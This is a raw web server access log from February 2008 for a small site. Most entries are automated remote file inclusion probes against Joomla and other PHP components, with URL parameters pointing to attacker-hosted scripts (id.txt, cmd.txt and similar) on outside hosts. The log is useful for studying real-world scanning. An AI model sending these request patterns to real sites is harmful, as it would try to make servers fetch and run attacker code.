62.151.23.213 - - [17/Feb/2008:07:30:42 -0800] "GET /logs/access_071202.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:07:31:01 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:07:31:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [17/Feb/2008:07:31:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:31:03 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:31:05 -0800] "GET /logs/access_080118.log/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:31:17 -0800] "GET /logs/access_071202.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:07:31:20 -0800] "GET /index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:31:30 -0800] "GET /logs/access_080106.log//administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:31:30 -0800] "GET //administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:31:31 -0800] "GET /logs//administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.50.141 - - [17/Feb/2008:07:31:35 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:07:31:38 -0800] "GET /logs/access.log/index.php?sub=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.181.6.216 - - [17/Feb/2008:07:31:46 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://194.181.6.216/chez/kupa/spread1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.2.32.38 - - [17/Feb/2008:07:32:04 -0800] "GET /logs/access_071225.log/?mosConfig_absolute_path=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.2.32.38 - - [17/Feb/2008:07:32:04 -0800] "GET /?mosConfig_absolute_path=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
212.2.32.38 - - [17/Feb/2008:07:32:05 -0800] "GET /logs/?mosConfig_absolute_path=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 200 35695 "-" "libwww-perl/5.79" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:07:32:47 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:33:06 -0800] "GET /logs/access_080103.log//administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.103 - - [17/Feb/2008:07:33:59 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.200.222.72 - - [17/Feb/2008:07:34:14 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:34:15 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:34:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:34:20 -0800] "GET /logs/access_080106.log//index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:34:20 -0800] "GET //index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:34:21 -0800] "GET /logs//index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.2.32.38 - - [17/Feb/2008:07:35:16 -0800] "GET /?mosConfig_absolute_path=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:35:19 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.23.4 - - [17/Feb/2008:07:35:20 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:36:05 -0800] "GET /logs/access_080103.log//index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:07:36:10 -0800] "GET /index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.55.48.7 - - [17/Feb/2008:07:36:34 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.27.112 - - [17/Feb/2008:07:36:58 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.150 - - [17/Feb/2008:07:36:59 -0800] "GET /tmp/ HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:07:37:03 -0800] "GET /logs/access_080131.log/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:07:37:04 -0800] "GET /index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:07:37:04 -0800] "GET /logs/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:07:37:27 -0800] "GET /logs//index2.php?pag=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
90.185.233.233 - - [17/Feb/2008:07:37:28 -0800] "GET //index2.php?pag=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.22.158 - - [17/Feb/2008:07:37:40 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:07:37:43 -0800] "GET /logs/access_080121.log/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:07:37:44 -0800] "GET /logs/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.141 - - [17/Feb/2008:07:37:46 -0800] "GET /?D=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:38:54 -0800] "GET /logs/access_080108.log/index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:38:54 -0800] "GET /index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:38:55 -0800] "GET /logs/index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:39:03 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.13.86.23 - - [17/Feb/2008:07:39:18 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:07:39:21 -0800] "GET /logs/access_080121.log//components/minibb/index.php?absolute_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:07:39:21 -0800] "GET //components/minibb/index.php?absolute_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:07:39:21 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:07:39:22 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:07:39:38 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:07:39:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:07:39:38 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.160 - - [17/Feb/2008:07:39:50 -0800] "GET /tmp/sess_2a08b3899d6c526d8a0c07adea736c37 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:07:40:08 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:07:41:22 -0800] "GET /logs/access_080108.log/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.210.10.14 - - [17/Feb/2008:07:41:35 -0800] "GET /index.php?so=http://landleben.bieswang.de/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
190.210.10.14 - - [17/Feb/2008:07:41:35 -0800] "GET /logs/index.php?so=http://landleben.bieswang.de/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
125.246.32.3 - - [17/Feb/2008:07:41:45 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/zafira/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.246.32.3 - - [17/Feb/2008:07:41:45 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/zafira/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.246.32.3 - - [17/Feb/2008:07:41:46 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/zafira/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:41:57 -0800] "GET /logs/access_080118.log//club/index.php?option=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:41:57 -0800] "GET //club/index.php?option=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:41:57 -0800] "GET /logs//club/index.php?option=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.2.32.38 - - [17/Feb/2008:07:42:07 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.111.169.172 - - [17/Feb/2008:07:42:11 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:42:29 -0800] "GET /logs/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:42:29 -0800] "GET /index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:42:48 -0800] "GET /logs/access_080101.log/index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:07:42:59 -0800] "GET /logs/access_080131.log/index.php?pag=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:07:43:00 -0800] "GET /index.php?pag=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:07:43:00 -0800] "GET /logs/index.php?pag=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:07:43:01 -0800] "GET /logs/access_080108.log//components/minibb/index.php?absolute_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.213.57.49 - - [17/Feb/2008:07:43:15 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
204.213.57.49 - - [17/Feb/2008:07:43:19 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
153.19.101.68 - - [17/Feb/2008:07:43:26 -0800] "GET /logs/access_080117.log/task.php?task=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [17/Feb/2008:07:43:26 -0800] "GET /logs/access_080117.log/task.php?task=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [17/Feb/2008:07:43:27 -0800] "GET /logs/task.php?task=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [17/Feb/2008:07:43:27 -0800] "GET /logs/task.php?task=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:43:34 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:43:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:43:35 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:07:43:55 -0800] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:07:43:55 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:07:43:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:44:03 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:44:04 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:44:17 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [17/Feb/2008:07:44:17 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.tnt-hq.net/ultrastats/images/weapons/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/mv.id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.175.3 - - [17/Feb/2008:07:44:25 -0800] "GET /logs/access_071230.log//club/index.php?option=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.250.150.73 - - [17/Feb/2008:07:44:35 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
209.250.150.73 - - [17/Feb/2008:07:44:35 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.55.146.38 - - [17/Feb/2008:07:44:52 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.55.146.38 - - [17/Feb/2008:07:44:52 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.105.61.241 - - [17/Feb/2008:07:44:56 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://crime.fileave/klotok.txt?http://crime.fileave/klotok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.213.57.49 - - [17/Feb/2008:07:45:54 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
204.213.57.49 - - [17/Feb/2008:07:46:03 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:07:46:17 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [17/Feb/2008:07:46:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:07:47:10 -0800] "GET /logs/access_080121.log/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:07:47:11 -0800] "GET /logs/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:07:47:23 -0800] "GET /logs/access_080131.log/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:07:47:24 -0800] "GET /index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:07:47:24 -0800] "GET /logs/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [17/Feb/2008:07:48:01 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [17/Feb/2008:07:48:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.252.162 - - [17/Feb/2008:07:48:33 -0800] "GET /logs/access_080123.log/class/forumpollrenderer.php?bbPath[path]=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.252.162 - - [17/Feb/2008:07:48:33 -0800] "GET /class/forumpollrenderer.php?bbPath[path]=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
